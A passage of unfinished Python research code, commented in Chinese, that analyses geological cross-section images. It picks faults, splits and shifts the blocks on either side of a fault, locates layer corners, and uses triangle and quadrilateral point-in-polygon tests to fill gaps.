判断条件为temp_img_tag是否存在tag\"\"\" \n if method_for_stop==2: \n content_flag=tag in temp_img_tag\n \n if content_flag:\n print('picking is not complete')\n else: \n print('everything is OK')\n \n #检查'everything is OK'是否成立\n check=False\n if check: \n count=0 \n for i in range(np.shape(temp_img_tag)[0]):\n for j in range(np.shape(temp_img_tag)[1]):\n if temp_img_tag[i,j]==tag:\n count+=1 \n print(count) \n \n #显示一下Content的位置\n if show:\n ShowFractions(fractions,img_rgb,rgb_dict,text,output)\n \n return fractions\n\n#============================================================================== \n#处理掉total_fractions中所有fault对象的函数\ndef DeleteFault(total_fractions):\n \n #结果fractions列表\n result_fractions=[]\n \n for this_fraction in total_fractions: \n \n if type(this_fraction) is not o.fault:\n \n result_fractions.append(this_fraction)\n \n return result_fractions \n\n#9.14\n\n#从图像中获取断层\ndef FaultFrom(total_fractions,img_rgb,show=False):\n \n print('')\n print('here comes a new fault')\n print('......')\n print('please pick the fault')\n \n #点击获取像素点坐标\n fault_point_pos=plt.ginput(1)[0]\n\n print('......')\n print('picking the fault')\n \n #注意反过来,因为是xy坐标\n pos_xy=[int(fault_point_pos[0]),int(fault_point_pos[1])]\n \n import copy\n \n pos_IJ=copy.deepcopy(pos_xy)\n \n #IJ形式是xy形式的颠倒\n pos_IJ.reverse()\n \n #所有fault的列表\n total_faults=[]\n \n #这个点到所有fault的距离列表\n distance_total_faults=[]\n \n #建立所有fault的列表\n #计算这个点到fault中心的远近\n for this_fraction in total_fractions:\n \n if isinstance(this_fraction,o.fault):\n \n #上车上车\n total_faults.append(this_fraction)\n \n #计算距离\n distance_this_fault=Distance(this_fraction.center,pos_xy)\n distance_total_faults.append(distance_this_fault)\n \n #队距离和fault对象建立索引你关系\n map_distance_total_faults=dict(zip(distance_total_faults,total_faults))\n \n for this_fault in total_faults:\n \n #首先直接判断是否位于content内部\n if pos_IJ in this_fault.content:\n\n print('......')\n print('picking of the fault is over')\n \n if show:\n ShowEdge(this_fault,img_rgb)\n \n return this_fault\n \n #其次如果第一下没点上,通过计算距离远近来判断\n that_fraction=map_distance_total_faults[min(distance_total_faults)]\n\n print('......')\n print('picking of the fault is over')\n \n if show:\n ShowEdge(this_fraction,img_rgb)\n \n return that_fraction\n\n#============================================================================== \n\"\"\"移动plate相关函数\"\"\"\n#通过fault来确定上下盘\n#tag_layer是需要抽取layer的tag\n#now_img_tag表示现在tag矩阵\n#total_fractions是需要拆分的fraction集合\ndef PickUpAndDown(fault,total_fractions,now_img_tag,img_rgb,rgb_dict,\n show=False,text=False,output=False): \n \n layer_tag=list(rgb_dict.keys())\n \n #删除背景tag\n layer_tag.remove(0)\n \n #删除fault的tag\n layer_tag.remove(-1)\n \n #删除基底tag\n base_tag=GetBaseTag(now_img_tag)\n layer_tag.remove(base_tag)\n\n #从fractions中删除fault\n total_fractions_temp=copy.copy(total_fractions)\n total_fractions_temp.remove(fault)\n \n #先确定上盘由fault.edge来确定\n #左右tag列表\n tag_left,tag_right=[],[] \n \n #fault.edge中符合左右tag值的即可 \n for pos in fault.edge:\n \n #左右tag值坐标\n pos_right=[pos[0],pos[1]+1] \n pos_left=[pos[0],pos[1]-1]\n \n #左右tag\n tag_left.append(now_img_tag[pos_left[0],pos_left[1]]) \n tag_right.append(now_img_tag[pos_right[0],pos_right[1]]) \n \n #成为集合,转为列表\n tag_left=list(set(tag_left)) \n tag_right=list(set(tag_right))\n \n #删除不符合layer_tag的元素\n #左\n tag_left_temp=[]\n \n for tag in tag_left:\n if tag in layer_tag:\n tag_left_temp.append(tag) \n #右\n tag_right_temp=[]\n \n for tag in tag_right:\n if tag in layer_tag:\n tag_right_temp.append(tag)\n \n tag_left,tag_right=tag_left_temp,tag_right_temp\n \n \"\"\"\n 很关键:确定上下盘分别是哪些fractions\n 上下盘和左右盘的关系由倾向确定\n 左倾:上盘是左\n 右倾:上盘是右\n 确定左右以后,根据center的位置确定total_fractions中哪些上哪些下\n \"\"\"\n \n #先求出左右盘的fractions\n #左右盘fractions列表\n fractions_left=[]\n fractions_right=[]\n\n for this_fraction in total_fractions:\n #左盘\n if this_fraction.center[0]<fault.center[0]:\n fractions_left.append(this_fraction)\n \n #右盘\n if this_fraction.center[0]>fault.center[0]:\n fractions_right.append(this_fraction)\n \n #上下盘的fractions\n fractions_up,fractions_down=[],[]\n\n #初始化倾向\n fault.Init(now_img_tag) \n \n #左倾:左是上盘\n if fault.inclination=='left':\n \n fractions_up=copy.deepcopy(fractions_left)\n fractions_down=copy.deepcopy(fractions_right)\n \n #右倾:右是上盘\n if fault.inclination=='right':\n \n fractions_up=copy.deepcopy(fractions_right)\n fractions_down=copy.deepcopy(fractions_right)\n \n #建立上下盘的plate对象\n plate_up=o.plate()\n plate_down=o.plate()\n \n #并进行初始化\n plate_up.Init(fractions_up)\n plate_down.Init(fractions_down)\n \n #显示 \n if show:\n \n #上下盘分别\n plate_up.Show(img_rgb,rgb_dict,text,output)\n plate_down.Show(img_rgb,rgb_dict,text,output)\n \n #合照\n plates=[plate_up,plate_down]\n ShowPlates(plates,img_rgb,rgb_dict,text,output)\n \n return plate_up,plate_down\n\n#============================================================================== \n#写一个大函数,表示参与移动的上下盘\ndef MovePlate(plate_up,plate_down,fault,img_tag,mode,show=False):\n \n #top的tag作为目标\n if plate_up.top.tag==plate_down.top.tag:\n \n target_tag=plate_up.top.tag\n \n #如果两侧top的tag不等,那么要找较新的layer作为tag\n else:\n #上下盘others的tag集合\n plate_up_others_tag,plate_down_others_tag=[],[]\n \n #给以上列表赋值\n for this_fraction in plate_up.others:\n \n plate_up_others_tag.append(this_fraction.tag)\n \n for this_fraction in plate_down.others:\n \n plate_down_others_tag.append(this_fraction.tag)\n \n #判断方法:\n #1) up的top在down的others里:down的top\n if plate_up.top.tag in plate_down_others_tag:\n \n target_tag=plate_down.top.tag\n \n #2) down的top在up的others里:up的top\n if plate_down.top.tag in plate_up_others_tag:\n \n target_tag=plate_up.top.tag \n\n #根据tag找角点,\n pos_top_up,pos_bottom_up,pos_top_down,pos_bottom_down=fault.AngleUpDown(target_tag,img_tag)\n \n #根据mode分别使用bottom和top模式\n #以top点位基准\n if mode=='top':\n i_offset=pos_top_up[0]-pos_top_down[0]\n j_offset=pos_top_up[1]-pos_top_down[1]\n \n #以bottom点位基准\n if mode=='bottom':\n i_offset=pos_bottom_up[0]-pos_bottom_down[0]\n j_offset=pos_bottom_up[1]-pos_bottom_down[1] \n\n #up在前移动-,down移动+\n #假设移动相同的距离或是其他大小\n plate_up.Move(-np.ceil(i_offset/2),-np.ceil(j_offset/2)) \n plate_down.Move(np.ceil(i_offset/2),np.ceil(j_offset/2)) \n \n return plate_up,plate_down \n \n#计算plates面积 \n#plates表示所有plate\ndef Area(plates,target_tag,img_rgb,rgb_dict):\n \n #临时矩阵\n img_temp=np.full(np.shape(img_rgb),img_rgb[0,0]) \n \n #所有plate的content着色\n for this_plate in plates:\n \n for this_fraction in this_plate.fractions:\n \n for pos in this_fraction.content:\n \n i,j=pos[0],pos[1]\n img_temp[i,j]=rgb_dict[this_fraction.tag] \n \n #计算fractions的面积\n area=len(img_temp[img_temp==rgb_dict[target_tag]])/np.shape(img_rgb)[-1]\n \n return area\n\n#确定top和bottom模式\ndef ChooseMode(plates,fault,target_tag,img_tag,img_rgb,rgb_dict):\n \n #复制生成两种模式各自的自变量\n plates_top=copy.deepcopy(plates)\n plates_bottom=copy.deepcopy(plates)\n \n #移动\n plates_top=MovePlate(plates_top[0],plates_top[1],fault,img_tag,'top')\n plates_bottom=MovePlate(plates_bottom[0],plates_bottom[1],fault,img_tag,'bottom')\n\n #移动后面积\n area_top=Area(plates_top,target_tag,img_rgb,rgb_dict)\n area_bottom=Area(plates_bottom,target_tag,img_rgb,rgb_dict)\n \n #模式和面积的对应关系\n mode_area_dict={'top':area_top,'bottom':area_bottom}\n area_deficit=abs(area_top-area_bottom)\n \n #正断:取小\n if fault.polarity=='positive':\n \n mode=DictKeyOfValue(mode_area_dict,min(list(mode_area_dict.values()))) \n \n print('\\nto thicken the layer',area_deficit)\n \n #逆断:取大\n if fault.polarity=='negative':\n \n mode=DictKeyOfValue(mode_area_dict,max(list(mode_area_dict.values()))) \n \n print('\\nto fill the gap',area_deficit)\n \n return mode \n\n\"\"\"how to thicken and fill?\"\"\"\n\n#正式地移动plate函数\ndef TrueMove(plate_up,plate_down,fault,target_tag,\n img_tag,img_rgb,rgb_dict,show=False,text=False,output=False):\n \n #计算移动模式\n true_mode=ChooseMode([plate_up,plate_down],fault,target_tag,img_tag,img_rgb,rgb_dict)\n \n# print(true_mode)\n \n #正式地移动\n plates=MovePlate(plate_up,plate_down,fault,img_tag,true_mode)\n \n if show: \n #复制plates \n plates_to_show=copy.deepcopy(plates) \n \n ShowPlates(plates_to_show,img_rgb,rgb_dict,text,output)\n \n #显示单独层\n fractions_to_show=[]\n \n #将所有plate对象平移并显示\n for this_plate in plates:\n \n# 显示顶部\n fractions_to_show.append(this_plate.top)\n# \n# #显示底部\n# fractions_to_show+=this_plate.others\n\n ShowFractions(fractions_to_show,img_rgb,rgb_dict,text,output)\n \n return plates\n\n#============================================================================== \n#给所有layer对象赋予角点\n#输入layer_tag,遍历\n#对total_fractions进行操作\ndef PickAngle(total_fractions,img_tag):\n \n #建立layer���象集合\n Layer=[]\n \n #建立layer的tag集合\n layer_tag=[]\n \n #建立fault对象集合\n Fault=[]\n \n for this_fraction in total_fractions:\n \n if type(this_fraction) is o.layer:\n Layer.append(this_fraction)\n layer_tag.append(this_fraction.tag)\n \n if type(this_fraction) is o.fault:\n Fault.append(this_fraction)\n \n #转化为列表 \n layer_tag=list(set(layer_tag)) \n \n #全世界所有的angle点\n Angle_temp=[]\n\n \"\"\"1 收录layer与pad的边界点\"\"\"\n \n for this_layer in Layer:\n \n #edge的横纵坐标\n I_edge=[pos[0] for pos in this_layer.edge]\n J_edge=[pos[1] for pos in this_layer.edge]\n \n #找最小值\n J_min=min(J_edge)\n J_max=max(J_edge)\n \n #符合J最值的I列表与临时\n I_max_temp=[]\n I_min_temp=[]\n \n I_max=[]\n I_min=[]\n \n count=0\n\n for J in J_edge: \n \n #收录两端的点\n if J==J_max: \n I_max_temp.append(I_edge[count])\n \n if J==J_min: \n I_min_temp.append(I_edge[count]) \n \n count+=1 \n \n #1表示背景白色 \n I_max=[I for I in I_max_temp if img_tag[I,J_max+1]==1] \n I_min=[I for I in I_min_temp if img_tag[I,J_min-1]==1]\n \n #max I J 和 min I J 的排列组合\n \n #判断这种点是否存在\n if I_max!=[]:\n Angle_temp.append([max(I_max),J_max])\n Angle_temp.append([min(I_max),J_max])\n \n if I_min!=[]: \n Angle_temp.append([max(I_min),J_min])\n Angle_temp.append([min(I_min),J_min])\n \n \"\"\"2 收录layer与fault的边界点\"\"\" \n \n for target_tag in layer_tag:\n \n for this_fault in Fault:\n\n #边缘左侧点坐标列表\n edge_left=[]\n \n #边缘右侧点坐标列表\n edge_right=[]\n \n #fault.edge中符合左右tag值的即可 \n \n for pos in this_fault.edge:\n \n #左右tag值\n pos_left=[pos[0],pos[1]-1]\n pos_right=[pos[0],pos[1]+1]\n \n #左右点集合\n if img_tag[pos_left[0],pos_left[1]]==target_tag:\n edge_left.append(pos_left)\n \n if img_tag[pos_right[0],pos_right[1]]==target_tag:\n edge_right.append(pos_right) \n \n #左侧点的上下顶点\n I_left=[pos[0] for pos in edge_left]\n J_left=[pos[1] for pos in edge_left]\n \n #右侧点的上下顶点\n I_right=[pos[0] for pos in edge_right]\n J_right=[pos[1] for pos in edge_right] \n \n #不完全统计\n \n #左侧有点的情况 \n if I_left!=[] and J_left!=[]: \n \n #两个列表合成字典\n I_J_left=dict(zip(I_left,J_left))\n \n #寻找块体角点\n pos_top_left=[min(I_left),I_J_left[min(I_left)]]\n pos_bottom_left=[max(I_left),I_J_left[max(I_left)]]\n \n Angle_temp.append(pos_top_left)\n Angle_temp.append(pos_bottom_left)\n\n #右侧有点的情况 \n if I_right!=[] and J_right!=[]: \n\n #两个列表合成字典\n I_J_right=dict(zip(I_right,J_right))\n \n #寻找块体角点\n pos_top_right=[min(I_right),I_J_right[min(I_right)]]\n pos_bottom_right=[max(I_right),I_J_right[max(I_right)]]\n \n Angle_temp.append(pos_top_right)\n Angle_temp.append(pos_bottom_right) \n\n #并创建空列表 \n Angle=[]\n\n #清除相同的点 \n \n for pos in Angle_temp:\n \n if pos not in Angle: \n Angle.append(pos)\n \n \"\"\"在获取了潜在角点之后,对每个layer赋予真实角点,没分到角点的启用max-min机制生成角点\"\"\" \n \n return Angle\n\n#============================================================================== \n#标记某个点 \ndef ShowOnePoint(pos,length_of_side,img_rgb):\n \n #对正方形边赋值\n img_rgb[pos[0]-length_of_side,pos[1]-length_of_side:pos[1]+length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]+length_of_side,pos[1]-length_of_side:pos[1]+length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]-length_of_side:pos[0]+length_of_side,pos[1]-length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]-length_of_side:pos[0]+length_of_side,pos[1]+length_of_side]=np.array([0,0,0])\n \n #对正方形角赋值\n img_rgb[pos[0]-length_of_side,pos[1]-length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]+length_of_side,pos[1]-length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]-length_of_side,pos[1]+length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]+length_of_side,pos[1]+length_of_side]=np.array([0,0,0])\n \n return img_rgb\n\ndef ShowAllAngle(Angle,length_of_side,img_rgb):\n\n #在角点处画正方形:上下length_of_side个像素点\n #pos[0]-10:pos[0]+10,pos[1]-10:pos[1]+10\n for pos in Angle: \n \n img_rgb=ShowOnePoint(pos,length_of_side,img_rgb)\n\n plt.imshow(img_rgb)\n\n#将总角点分配给各个layer \ndef DistributeAngle(Angle,Layer):\n \n #遍历每一个Angle坐标\n for pos in Angle:\n \n #遍历每一个layer对象\n for this_layer in Layer: \n if pos in this_layer.edge:\n \n #将拟角点集合中添加这个坐标\n this_layer.angle.append(pos)\n \n break\n \n#显示fraction对象的边界点\ndef ShowEdge(fraction,img_rgb):\n \n #对所有的边界点,赋予全0的rgb值\n for pos in fraction.edge:\n \n img_rgb[pos[0],pos[1]]=np.array([0,0,0])\n \n plt.imshow(img_rgb) \n \n#用于检验并显示某个layer的角点\ndef CheckAngle(which_layer,length_of_side,img_rgb):\n \n# #打印每一个点的坐标\n# print(which_layer.angle)\n# print(len(which_layer.angle))\n \n #标记出所有的角点\n for pos in which_layer.angle: \n img_rgb=ShowOnePoint(pos,length_of_side,img_rgb)\n \n #对所有的边界点,赋予全0的rgb值 \n for pos in which_layer.edge:\n img_rgb[pos[0],pos[1]]=np.array([0,0,0]) \n \n plt.imshow(img_rgb) \n \n#============================================================================== \n#写调整angle的函数\n#事后将其写进类里\n#计算两点之间的距离\ndef Distance(pos_A,pos_B):\n \n #判断pos_A,pos_B的数据类型,无论如何都转化为np.array\n if type(pos_A) is not np.array:\n pos_A=np.array(pos_A)\n \n if type(pos_B) is not np.array:\n pos_B=np.array(pos_B)\n \n return np.sqrt(np.sum((pos_A-pos_B)**2))\n\n#调整layer的angle\n#低版本\ndef AdjustAngle(which_layer,img_rgb):\n \n #确保角点数量大于4\n if len(which_layer.angle)>=4:\n \n pos_center=[which_layer.center[1],which_layer.center[0]]\n \n #然后以center为中心把layer分成四个象限\n #把angle分配到4个list当中\n \n for pos_angle in which_layer.angle:\n \n #下\n if pos_angle[0]>pos_center[0]:\n \n #左 下\n if pos_angle[1]<pos_center[1]: \n which_layer.bottom_left_list.append(pos_angle)\n \n #右 下 \n if pos_angle[1]>pos_center[1]: \n which_layer.bottom_right_list.append(pos_angle)\n \n #上\n if pos_angle[0]<pos_center[0]:\n \n #左 上\n if pos_angle[1]<pos_center[1]: \n which_layer.top_left_list.append(pos_angle)\n \n #右 上\n if pos_angle[1]>pos_center[1]: \n which_layer.top_right_list.append(pos_angle)\n #6.28\n \n #遍历四个角angle列表,计算和中心的距离\n \n #距离列表 \n all_distance=[[],[],[],[]]\n \n #四个角点列表\n all_list=[which_layer.bottom_left_list,\n which_layer.bottom_right_list,\n which_layer.top_left_list,\n which_layer.top_right_list]\n \n #四个最终角点\n all_angle=[]\n \n for k in range(len(all_distance)):\n \n #遍历角点列表\n for pos_angle in all_list[k]:\n \n #距离列表赋值\n all_distance[k].append(Distance(pos_angle,pos_center))\n \n if all_distance[k]!=[]:\n \n #建立距离和点的索引\n distance_angle=dict(zip(all_distance[k],all_list[k]))\n \n #对layer对象中的四大angle进行赋值\n all_angle.append(distance_angle[max(all_distance[k])])\n \n #若不符合条件,添加一个None\n \n else: \n all_angle.append(None)\n \n #赋值给类属性\n which_layer.bottom_left,\\\n which_layer.bottom_right,\\\n which_layer.top_left,\\\n which_layer.top_right\\\n =all_angle\n \n #6.29\n \n \"\"\"解决角点扎堆问题:退而��其次法\n 若某点为None,用which_layer.angle中的其他点来做替代\"\"\"\n #应当将两种方法合而为一\n \n #建立左右部分角点列表\n left_angle=[pos for pos in which_layer.angle if pos[1]<pos_center[1]] \n right_angle=[pos for pos in which_layer.angle if pos[1]>pos_center[1]] \n \n #左右深度\n left_depth=[pos[0] for pos in left_angle]\n right_depth=[pos[0] for pos in right_angle]\n \n #建立深度与角点坐标的列表\n left_depth_angle=dict(zip(left_depth,left_angle))\n right_depth_angle=dict(zip(right_depth,right_angle))\n \n #逐个点描述比较稳妥\n \n #左下\n if which_layer.bottom_left==None:\n which_layer.bottom_left=left_depth_angle[max(left_depth)]\n \n #右下\n if which_layer.bottom_right==None:\n which_layer.bottom_right=right_depth_angle[max(right_depth)]\n \n #左上\n if which_layer.top_left==None:\n which_layer.top_left=left_depth_angle[max(left_depth)]\n \n #右上\n if which_layer.top_right==None:\n which_layer.top_right=right_depth_angle[max(right_depth)] \n \n #重新定义(作图需要)\n all_angle=[which_layer.bottom_left,\n which_layer.bottom_right,\n which_layer.top_left,\n which_layer.top_right]\n \n #以下部分可写一个检验模块\n print('')\n \n #显示中心\n ShowOnePoint([int(pos_center[0]),int(pos_center[1])],3,img_rgb)\n \n #检查这些点的位置\n for pos in all_angle:\n print(pos)\n \n #方框标记出角点\n if pos!=None:\n ShowOnePoint(pos,3,img_rgb)\n \n plt.imshow(img_rgb)\n\n else:\n print('insufficient angles')\n \n#7.3 \n \n\"\"\"计算多边形面积,判断点是否在多边形内部相关问题\"\"\" \n#============================================================================== \n#计算三角形面积的函数(海伦公式)\n#pos_A,pos_B,pos_C为三角形三个顶点\ndef AreaTriangle(ABC):\n \n pos_A,pos_B,pos_C=ABC\n \n #计算三条边长\n AB=Distance(pos_A,pos_B)\n AC=Distance(pos_A,pos_C)\n CB=Distance(pos_C,pos_B)\n \n a,b,c=CB,AC,AB\n p=(a+b+c)/2\n \n return np.sqrt(p*(p-a)*(p-b)*(p-c))\n\n#判断点P在三角形内的函数\n#pos_P是参与判断的点\n#ABC是三角形的三个顶点列表,即ABC=[pos_A,pos_B,pos_C]\ndef PointInTriangle(pos_P,ABC):\n \n #还原ABC坐标\n pos_A,pos_B,pos_C=ABC\n \n #向量化\n pos_A=np.array(pos_A)\n pos_B=np.array(pos_B)\n pos_C=np.array(pos_C)\n \n pos_P=np.array(pos_P)\n \n #使用方法2\n method='2'\n \n #方法一:面积法\n if method=='1':\n\n Area_PAB=AreaTriangle(pos_A,pos_B,pos_P) \n Area_PAC=AreaTriangle(pos_A,pos_P,pos_C) \n Area_PBC=AreaTriangle(pos_P,pos_B,pos_C)\n \n Area_ABC=AreaTriangle(pos_A,pos_B,pos_C)\n Area_sum=Area_PAB+Area_PAC+Area_PBC\n \n \n #判断PAB,PAC,PBC的总面积和ABC是否相等 \n if Area_sum==Area_ABC:\n return True \n else:\n return False\n \n #方法二:向量法\n \n if method=='2':\n \n #向量法:_AP=u*_AC+v*_AB,其中_AP,_AB,_AC都是向量\n _AP=pos_A-pos_P\n \n _AC=pos_A-pos_C\n _AB=pos_A-pos_B\n \n #解方程组\n #_AP[0]=u*_AC[0]+v*_AB[0]\n #_AP[1]=u*_AC[1]+v*_AB[1]\n \n import sympy\n u=sympy.Symbol('u')\n v=sympy.Symbol('v')\n \n #得到的解是一个数组\n answer=sympy.solve([u*_AC[0]+v*_AB[0]-_AP[0],u*_AC[1]+v*_AB[1]-_AP[1]],[u,v])\n \n# print(answer[u],answer[v])\n \n u,v=answer[u],answer[v]\n \n #判断条件:0<=u<=1,0<=v<=1,0<=u+v<=1\n if 0<=u<=1 and 0<=v<=1 and 0<=u+v<=1:\n return True \n else:\n return False\n \n#============================================================================== \n#判断四边形的凹凸\ndef ConcaveOrConvexOfQuadrangle(ABCD):\n \n pos_ABCD=[]\n \n #转化为数组\n for pos in ABCD: \n pos_ABCD.append(list(pos))\n \n# print(pos_ABCD)\n \n #四个顶点的坐标\n pos_A,pos_B,pos_C,pos_D=pos_ABCD\n \n #生成一个列表表示各点在三角形内部与否的逻辑值列表\n bool_point_in_triangle_list=[]\n \n #判断四个点和其他三个点组成的三角形的位置关系\n for pos in pos_ABCD:\n \n #删取一个顶点\n pos_triangle_temp=pos_ABCD.copy()\n pos_triangle_temp.remove(pos)\n \n# print(pos)\n# print(pos_triangle_temp)\n \n #三个顶点生成三角形\n triangle_temp=o.triangle(pos_triangle_temp)\n \n# print(triangle_temp.area)\n \n #将逻辑值加入列表\n bool_point_in_triangle=triangle_temp.IncludePoint(pos)\n \n# print(bool_point_in_triangle)\n \n bool_point_in_triangle_list.append(bool_point_in_triangle)\n \n# print(bool_point_in_triangle_list)\n \n #判断是否有点不在三角形内\n if True in bool_point_in_triangle_list: \n return 'concave'\n else:\n return 'convex' \n \n#给四边形四个顶点以正确的链接顺序排序\ndef OrderOfQuadrangle(ABCD):\n \n #若四边形凹\n if ConcaveOrConvexOfQuadrangle(ABCD)=='concave':\n \n #重新给出合理坐标\n print('give the points in order')\n \n if ConcaveOrConvexOfQuadrangle(ABCD)=='convex':\n \n #排序后的答案\n pos_ABCD_ordered=[]\n \n pos_ABCD=[]\n \n #转化为数组\n for pos in ABCD: \n pos_ABCD.append(np.array(pos))\n \n #四个顶点的坐标\n pos_A,pos_B,pos_C,pos_D=pos_ABCD\n \n #排列组合库\n import itertools\n \n #下标集合\n index_total=[k for k in range(len(pos_ABCD))]\n \n #列表内是总元素,数字是元素数量\n index_list=list(itertools.combinations(index_total,2))\n \n #index表示任意两个点的下标\n for index_MN in index_list:\n \n #MN之外的另外两个拟对角点 \n index_UV=[index for index in index_total if index not in index_MN]\n \n# print(index_MN,index_UV)\n \n #MN表示拟对角线中的其中一条\n pos_M=pos_ABCD[index_MN[0]]\n pos_N=pos_ABCD[index_MN[1]]\n \n #UV表示拟对角线中的其中一条\n pos_U=pos_ABCD[index_UV[0]]\n pos_V=pos_ABCD[index_UV[1]]\n \n# print(pos_M,pos_N,pos_U,pos_V)\n# print((pos_M-pos_N)[0],(pos_M-pos_N)[1])\n \n #求MN和PQ的交点O \n #解方程组 \n#7.6 \n #先求一些系数\n a_MN=(pos_M-pos_N)[1]/(pos_M-pos_N)[0]\n b_MN=-1\n c_MN=pos_N[1]-pos_N[0]*a_MN\n \n a_UV=(pos_U-pos_V)[1]/(pos_U-pos_V)[0]\n b_UV=-1\n c_UV=pos_V[1]-pos_V[0]*a_UV\n \n #保留2位小数\n# a_MN,b_MN,c_MN=float('%0.2f' %a_MN),float('%0.2f' %b_MN),float('%0.2f '%c_MN)\n# a_UV,b_UV,c_UV=float('%0.2f '%c_UV),float('%0.2f' %b_UV),float('%0.2f' %a_UV)\n# \n# print(a_MN,b_MN,c_MN)\n# print(a_UV,b_UV,c_UV)\n \n import sympy\n \n x=sympy.Symbol('x')\n y=sympy.Symbol('y')\n \n #得到的解是一个数组\n answer=sympy.solve([x*a_MN+y*b_MN+c_MN,x*a_UV+y*b_UV+c_UV],[x,y])\n\n #若两条线平行,那么他们没有交点,因此解坐标不存在\n if answer!=[]:\n \n x,y=answer[x],answer[y]\n \n #O为对角线交点\n pos_O=np.array([x,y])\n\n# print(pos_O) \n# print(pos_M,pos_O,pos_N)\n# print(pos_U,pos_O,pos_V)\n \n #判断对角线交点在四边形内部还是在反向延长线上\n #好几种情况:升 降都有可能\n \n #MN \n pos_MN_max=[max(pos_M[0],pos_N[0]),max(pos_M[1],pos_N[1])]\n pos_MN_min=[min(pos_M[0],pos_N[0]),min(pos_M[1],pos_N[1])]\n \n #UV\n pos_UV_max=[max(pos_U[0],pos_V[0]),max(pos_U[1],pos_V[1])]\n pos_UV_min=[min(pos_U[0],pos_V[0]),min(pos_U[1],pos_V[1])]\n \n #判断坐标在区间内\n if pos_MN_min[0]<=pos_O[0]<pos_MN_max[0]\\\n and pos_MN_min[1]<=pos_O[1]<pos_MN_max[1]\\\n and pos_UV_min[0]<=pos_O[0]<pos_UV_max[0]\\\n and pos_UV_min[1]<=pos_O[1]<pos_UV_max[1]:\n \n #保留两位小数 \n x=float('%0.2f' %pos_O[0])\n y=float('%0.2f' %pos_O[1])\n \n pos_O=np.array([x,y])\n# print(pos_O) \n# print('correct point') \n \n #输出正确顺序的点\n pos_ABCD_ordered=[pos_M,pos_U,pos_N,pos_V]\n \n# print(pos_ABCD_ordered) \n \n break \n \n #正确答案非空 \n if pos_ABCD_ordered!=[]: \n return pos_ABCD_ordered\n \n#计算四边形面积的函数\ndef AreaQuadrangle(ABCD):\n \n #重新排列\n ABCD=OrderOfQuadrangle(ABCD)\n \n# print(ABCD)\n \n #转化为数组\n pos_ABCD=[]\n \n for pos in ABCD: \n pos_ABCD.append(list(pos))\n \n #分割成小三角形并计算面积\n \n #这三个点索引为012和023\n point_list_triangle_1=pos_ABCD.copy()\n point_list_triangle_2=pos_ABCD.copy()\n \n #需要删除的点:索引为1和3\n point_triangle_1=pos_ABCD[1]\n point_triangle_2=pos_ABCD[3]\n \n #删除点\n point_list_triangle_1.remove(point_triangle_1)\n point_list_triangle_2.remove(point_triangle_2)\n \n #求面积\n area_triangle_1=AreaTriangle(point_list_triangle_1)\n area_triangle_2=AreaTriangle(point_list_triangle_2)\n \n# print(ABCD[:-1])\n# print(ABCD[1:])\n# \n# print(area_triangle_1)\n# print(area_triangle_2)\n \n #四边形的总面积\n area_quadrangle=np.around(area_triangle_1+area_triangle_2,2)\n \n# print(area)\n \n return area_quadrangle\n \n#判断点是否在四边形内的函数\n#pos_P是检测点,ABCD为四边形的四个顶点\ndef PointInQuadrangle(pos_P,ABCD):\n\n #重新排列\n ABCD=OrderOfQuadrangle(ABCD)\n \n #转化为数组\n pos_ABCD=[]\n \n for pos in ABCD: \n pos_ABCD.append(list(pos))\n \n# print(pos_ABCD) \n \n #转化类型\n# pos_P=np.array(pos_P)\n \n#7.9\n \n #分别计算四个三角形的面积\n #临时列表存放ABCD的坐标\n pos_ABCD_temp=ABCD.copy()\n \n #小三角形定则总面积\n total_area_triangle=0\n \n #测点位于小三角形内部的情况逻辑值列表\n list_point_in_triangle=[]\n \n #想办法让首元素顶到尾部\n for k in range(len(pos_ABCD)):\n \n #第一个元素\n first_point=pos_ABCD_temp[0]\n \n #赋值顶点列表\n point_list_triangle=pos_ABCD_temp[0:2] \n \n #增加被检测点\n point_list_triangle.append(pos_P)\n \n #删除第一个元素并添加至末尾\n pos_ABCD_temp.remove(first_point)\n pos_ABCD_temp.append(first_point)\n \n# print(point_list_triangle)\n \n #小三角形的面积的总面积\n total_area_triangle+=AreaTriangle(point_list_triangle)\n \n #测点位于小三角形内部的情况\n list_point_in_triangle.append(PointInTriangle(pos_P,point_list_triangle))\n \n method=2\n \n #方法1:通过四个三角形总面积和四边形面积的关系来判断\n if method==1:\n \n #若小三角形总面积和四边形面积相等,那么说明被检测点在四边形内部\n area_quadrangle=AreaQuadrangle(ABCD)\n \n# print(area_quadrangle)\n# print(total_area_triangle)\n# \n #由于浮点型,两者在小数点后好几位会有所差别,所以需要四舍五入\n if np.round(total_area_triangle-area_quadrangle)==0:\n \n return True\n else:\n return False\n \n #方法2:通过点在四个三角形的情况来判断\n if method==2:\n \n #只要列表内部不存在False即可判断点在四边形内部\n if False not in list_point_in_triangle:\n \n return True\n else:\n return False\n \n#============================================================================== \n#对layer进行填坑或补齐\ndef FillGap(plate_up,plate_down,img_rgb,rgb_dict,show=False,output=False):\n \n plates=[plate_up,plate_down]\n \n #被填充的点\n gap=[]\n \n #以下为四个角点\n ABCD=[plate_up.top.bottom_right,\\\n plate_down.top.bottom_left,\\\n plate_up.top.top_right,\\\n plate_down.top.top_left]\n \n# print(ABCD)\n \n #在这四个点横纵坐标的最大范围内进行搜索\n I=[pos[0] for pos in ABCD]\n J=[pos[1] for pos in ABCD]\n \n I_max,I_min=max(I),min(I) \n J_max,J_min=max(J),min(J)\n \n# print(I_max,I_min,J_max,J_min)\n \n #判断是否在该四边形内部\n for i in range(I_min,I_max+1):\n for j in range(J_min,J_max+1):\n# print(whj.PointInQuadrangle([i,j],ABCD))\n #需要计算一段时间\n if PointInQuadrangle([i,j],ABCD):\n gap.append([i,j])\n \n if show:\n #最顶层的点集合\n content=[]\n \n for this_plate in plates:\n \n content+=this_plate.top.content\n target_tag=this_plate.top.tag\n \n content+=gap \n \n #print(len(content))\n \n #显示\n ShowSomething(img_rgb,content,target_tag,rgb_dict,output)\n \n return gap \n\n#7.10\n#============================================================================== \n#初始化fault倾角函数\ndef InitTilt(fault):\n \n #fault边缘点���标\n I=[pos[0] for pos in fault.edge]\n J=[pos[1] for pos in fault.edge]\n \n #用J检索I\n I_J=dict(zip(I,J))\n \n #边缘集合中两侧存在layer_tag的最高点和最低点\n #由于纵坐标I是自上而下增长的,为描述方便,将其取相反数\n 